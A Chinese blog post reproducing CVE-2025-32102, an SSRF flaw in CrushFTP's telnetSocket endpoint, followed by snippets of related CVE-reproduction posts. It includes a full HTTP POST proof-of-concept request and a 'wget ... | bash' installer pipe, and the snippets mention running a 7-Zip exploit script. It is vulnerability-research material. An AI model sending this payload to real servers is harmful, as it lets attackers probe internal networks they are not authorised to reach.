CVE-2025-32102 | Ubuntu 下复现 CrushFTP telnetSocket接口SSRF

原创 已于 2025-04-24 16:07:05 修改 · 465 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ubuntu #网络安全 #漏洞复现 #crushftp #CVE

于 2025-04-24 15:19:25 首次发布

目录


1. 漏洞描述


CrushFTP是CrushFTP公司的一款文件传输服务器。

影响版本:CrushFTP 9.x 和 10.x 到 10.8.4 以及 11.x 到 11.3.1

2. POC


POST /WebInterface/function/ HTTP/1.1
Host: 192.168.119.144:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://192.168.119.144:8080/WebInterface/admin/index.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: currentAuth=DGfv; CrushAuth=1745390781868_uEmj17c4A6ypnRJCnZGXDj7wWEDGfv
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=DGfv

在这里插入图片描述

host参数的内容也可以是其他域名,查看域名的DNS解析记录即可确认是否访问成功。



3. Ubuntu 搭建环境


这里选择在 Ubuntu 中搭建 CrushFTP 11。

执行安装脚本:
wget -O - https://www.crushftp.com/crush11wiki/attach/Linux%20Install/configure.sh | bash
在这里插入图片描述


记住这个密码:‘crushadmin’ password = m4M7QsAe

(在 configure.sh 中设置了给 crushadmin 用户生成一个随机的密码。这里可以更改这个脚本,让生成的用户的密码是固定的,也可以后面再执行命令更改这个用户的密码。)



查看java版本,CrushFTP11 需要 Java17+:`java --version`

如果版本不符合,则执行下面的命令安装 JDK21:

wget https://download.java.net/java/GA/jdk21.0.1/415e3f918a1f4062a0074a2794853d0d/12/GPL/openjdk-21.0.1_linux-aarch64_bin.tar.gz
tar -xvf openjdk-21.0.1_linux-aarch64_bin.tar.gz
/bin/rm openjdk-21.0.1_linux-aarch64_bin.tar.gz
mv jdk-21* /var/opt/CrushFTP11/Java


进入 CrushFTP 的目录中 /var/opt/CrushFTP11(configure.sh 脚本中设置了将会安装在这个目录中),执行命令检查 init 脚本是否检测到它:./crushftp_init.sh info

在这里插入图片描述



启动 CrushFTP:./crushftp_init.sh start
在这里插入图片描述
(停止 CrushFTP 的命令:./crushftp_init.sh stop



生成 Admin 用户:./Java/bin/java -jar CrushFTP.jar -a "crushadmin" "123456"
这将创建一个新用户,并将其写入默认位置:用户/MainUsers/crushadmin/

现在,通过浏览器登录到管理控制台:

http://your_ip:8080/
https://your_ip:443/

用户名:crushadmin
密码:123456


在这里插入图片描述



Grafana XSSOpenRedirectSSRF漏洞复现CVE-2025-4123)
iSee857的博客
05-23 1688
Grafana 中存在一个跨站脚本 (XSS) 漏洞,该漏洞是由客户端路径遍历和开放重定向相结合引起的。这允许攻击者将用户重定向到托管将执行任意 JavaScript 的前端插件的网站。此漏洞不需要编辑者权限,如果启用了匿名访问,XSS 将正常工作。如果安装了 Grafana Image Renderer 插件,则可以利用 open 重定向来实现完全读取 SSRF。(CVE-2025-4123)
CrushFtp 权限绕过漏洞复现CVE-2025-31161)(附脚本)
iSee857的博客
04-24 348
漏洞源于 HTTP 组件的 AWS4\-HMAC\-SHA256 认证方法中存在竞态条件。攻击者可以通过构造特殊的 HTTP Authorization 请求头,在无需密码的情况下临时认证为任意用户(包括管理员账户),从而绕过正常认证机制。由于大多数用户选择默认管理员用户名(如 crushadmin),这使得漏洞利用变得极为简单,攻击者可以轻松获得系统完全控制权。(CVE-2025-31161)
CVE-2025-2825 | 分析 CrushFTP 绕过身份验证
Reset
04-24 1000
企业文件传输解决方案是许多组织的关键基础设施,可促进系统和用户之间的安全数据交换。CrushFTP 是一种广泛使用的多协议文件传输服务器,提供广泛的功能集,包括与 Amazon S3 兼容的 API 访问。但是,在版本 10.0.0 到 10.8.3 和 11.0.0 到 11.3.0 中发现了一个严重漏洞CVE-2025-2825),该漏洞允许未经身份验证的攻击者绕过身份验证并获得未经授权的访问。
CVE-2025-30208】| Vite-漏洞分析与复现
摘星怪sec的blog
03-28 3922
漏洞简介漏洞简介CVE-2025-30208 是 Vite 开发服务器中的一个任意文件读取漏洞。该漏洞允许攻击者通过特定的 URL 参数绕过访问控制,从而读取服务器上的敏感文件(如或。
CVE-2025-33073 NTLM反射 权限提升漏洞复现
渗透之路,攻防之间皆学问
06-18 3021
CVE-2025-33073是一个高危Windows SMB客户端漏洞,可通过NTLM/Kerberos认证反射实现域内SYSTEM权限提权。攻击者只需普通域账号,在满足目标主机未强制SMB签名且域DNS可被篡改的条件下,即可通过构造特殊DNS记录(如server11UWhRC...指向攻击机)、启动SMB中继服务(ntlmrelayx.py)和触发NTLM认证(PetitPotam)三个步骤,将认证反射回目标主机自身,最终获取SYSTEM权限。该漏洞影响所有未安装2025年6月补丁且未启用SMB签名的域内
[复现] CVE-2025-33053
安全小白,希望我的文章对你有所帮助。
06-29 1313
本地复现CVE-2025-33053
CVE-2025-32462-Linux sudo本地提权漏洞复现
selecthch的博客
07-02 2493
Linux 是一个免费开源的类Unix操作系统,广泛应用于服务器、嵌入式设备和云计算平台。sudo 是 Linux 系统中管理权限的核心工具,允许授权用户临时获取 root 或其他用户权限执行命令,既保障系统安全又便于操作审计。近日,Linux sudo 工具公开存在两个紧密关联的本地提权漏洞CVE-2025-32462 / CVE-2025-32463)。主流 Linux 发行版默认配置下,攻击者可利用这两个漏洞从普通用户权限提升至权限。
【内网渗透】也聊CVE-2025-33073 NTLM Reflection攻击
uuzeray的博客
06-19 1632
CVE-2025-33073 漏洞属于 NTLM Reflection(NTLM反射)攻击,而NTLM Reflection攻击是NTLM Relay(NTLM 中继)攻击的一种特殊形式,指的是将获得的受害者机器的NTLM认证请求重新反射回发送该请求的原始机器(即受害者机器)通过利用该漏洞,攻击者只要有任意权限的域用户权限且目标机器不开启 SMB 签名就能远程命令执行,而在大部分情况下,SMB 签名默认只有域控开,域内机器大多数是不开的。进行强制触发,让目标机器向指定DNS记录进行NTLM认证。
(CVE-2025-24813) Tomcat RCE 漏洞复现
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
03-12 1569
本文参考。
攻击者利用公开的 PoC (CVE-2025-2825) 攻击 CrushFTP 漏洞
网络研究观
04-03 1446
可能允许未经身份验证的攻击者通过暴露的 HTTP(S) 端口访问 CrushFTP 服务器。
centos8的openssh9.9p2 RPM包,解决漏洞CVE-2025-26465 和 CVE-2025-26466
03-04
OpenSSH 9.9p2版本是在CentOS 8环境下,针对两个安全漏洞CVE-2025-26465和CVE-2025-26466进行修复的升级版本。CVE-2025-26465漏洞描述为在处理加密过程中的边界条件时可能导致服务崩溃,而CVE-2025-26466则是由于...
elestio memos SSRF漏洞复现CVE-2025-22952)(附脚本)
iSee857的博客
04-11 350
eleestio/memos:latest 和 neosmemo/memos:latest 都存在 SSRF 漏洞,攻击者可以访问内网 IP 地址和协议。尽管努力将访问协议限制为 HTTP 和 HTTPS,但攻击者仍然可以访问 localhost 上运行的其他端口。此漏洞使攻击者能够访问内部网络上的任何资产、嗅探内部网络上的 Web 服务、扫描内部网络上的主机,并可能访问薄弱的内部端点。(CVE-2025-22952)
DataEase 未授权+远程代码执行漏洞复现(CVE-2025-49001、CVE-2025-49002)
李同學的安全圈
06-10 839
DataEase 是一款开源的数据分析平台,提供丰富的数据可视化和分析功能,帮助用户轻松地进行数据探索和决策支持。近日,有关DataEase 被爆出多个漏洞,其中 CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程,CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全。
Crushftp 认证绕过漏洞复现CVE-2025-2825)(附脚本)
iSee857的博客
03-31 653
CrushFTP 是一种广泛使用的企业级文件传输工具,从版本 10 开始,它实现了与 S3 兼容的 API 访问,允许客户端使用与 Amazon S3 存储服务相同的 API 格式交互。此漏洞出现在S3身份验证中,允许远程未授权攻击者通过暴露的 HTTP/HTTPS 端口访问服务器,可能导致敏感数据泄露或服务器控制权被接管(CVE-2025-2825)
ubuntu常见问题汇总
weixin_70025884的博客
08-17 504
本文提供了Ubuntu系统常见问题的解决方案汇总,包括安装启动问题(镜像损坏、双系统时间不一致、黑屏等)、软件更新问题(apt报错、deb依赖)、网络连接问题(WiFi驱动、SSH服务)、磁盘存储问题(空间不足、NTFS挂载)、系统修复(Grub引导、文件损坏)、桌面环境问题(Gnome崩溃、登录循环)以及常见错误修复(dpkg锁问题)。每个问题都给出了具体的终端命令解决方案,涵盖系统安装、驱动管理、网络配置、故障修复等多个方面,为Ubuntu用户提供了一套全面的故障排查指南。
Ubuntu 中安全删除 Windows 分区并优化磁盘空间利用】
dally2的博客
08-15 547
在双系统(Windows + Ubuntu)环境中,如果要完全移除 Windows,将磁盘空间全部用于 Ubuntu
ubuntu 编译ffmpeg6.1 增加drawtext,libx264,libx265等
最新发布
shelutai的博客
08-18 119
如果存在找不到库文件的情况,需要安装相应的库的dev包。重要说明,如果要支持drawtext滤镜,
Ubuntu22系统docker部署Dify【教程】
weixin_47782004的博客
08-17 871
CPU >= 2 核内存 >= 4 GiB。
ubuntu网络共享
weixin_41469272的博客
08-16 563
客户端请求 → enp0s25 → (NAT转换) → wlp3s0 → 互联网。互联网响应 → wlp3s0 → (状态检测) → enp0s25 → 客户端。的IP,但是不能访问互联网,则需要手动写NAT规则。如果windwos 已获取了。
CVE-2025复现
02-26
### 复现 CVE-2025-0411 7-zip 漏洞 为了成功复现CVE-2025-0411漏洞,需遵循一系列精确的操作流程。此漏洞存在于7-zip软件中,利用了处理特定构造文件时存在的缺陷。 #### 准备工作环境 确保拥有一个安全隔离的测试环境至关重要,建议在一个专门用于实验的安全沙箱内操作。这可以防止潜在风险扩散到生产环境中[^2]。 #### 获取必要的工具和资源 访问GitHub仓库`https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git`下载针对该漏洞的概念验证(PoC)代码。通过克隆上述链接中的项目获取所需材料。 ```bash git clone https://github.com/dhmosfunk/7-Zip-CVE-2025-0411-POC.git cd 7-Zip-CVE-2025-0411-POC/ ``` #### 安装受影响版本的应用程序 安装易受攻击的具体版本7-zip应用程序,在执行任何进一步步骤之前确认已正确设置目标应用及其依赖项。 #### 执行PoC脚本 按照README文档指示运行所提供的Python脚本来触发漏洞行为并观察其效果。通常情况下会有一个简单的命令行指令来启动测试过程: ```bash python exploit.py ``` 请注意,实际输出可能因具体实施细节而异;务必参照官方说明进行调整以适应不同场景下的需求。 #### 验证结果 一旦完成以上各阶段的工作,则应该能够看到预期的结果——即证明存在描述的安全隐患。然而重要的是要记住仅限于合法授权范围内开展此类活动,并始终采取适当措施保护个人隐私与数据安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值